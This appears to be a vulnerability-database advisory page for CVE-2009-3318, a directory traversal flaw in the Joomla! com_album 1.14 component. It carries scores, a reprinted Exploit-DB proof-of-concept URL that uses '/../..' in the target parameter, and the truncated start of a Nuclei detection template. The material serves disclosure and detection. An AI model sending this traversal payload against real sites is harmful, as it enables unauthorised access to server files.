CVE-2009-3318
published 2009-09-23CVE-2009-3318: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.46%
92.9th percentile
Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| breedveld | com_album | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_album 1.14 - Directory Traversal
exploitdb·2009-09-17
CVE-2009-3318 Joomla! Component com_album 1.14 - Directory Traversal
Joomla! Component com_album 1.14 - Directory Traversal
---
Joomla Component com_album Directory Traversal Vuln (version Album #1.14 )
# Author : DreamTurk
# mail : [email protected]
# home page : www.turkguvenligi.info
Down : http://www.breedveld.net/index.php?option=com_remository&Itemid=193&func=startdown&id=1
exp : http://localhost/index.php?option=com_album&Itemid=128&target=/../..
# gretZ : aLL My Friends & turkguvenligi.info Members & t4cs1zkr4L
note:
Album
23-05-2007
Roland Breedveld
This component is released under the GNU/GPL License
[email protected]
Breedveld.net
1.14
Album Component For Joomla/str0ke
# milw0rm.com [2009-09-17]
Nuclei
Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2009-3318 [HIGH] Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
Template:
id: CVE-2009-3318
info:
name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
impact: |
The vulnerability allows an attacker to include arbitrary files from the local file system,
2009-09-23
Published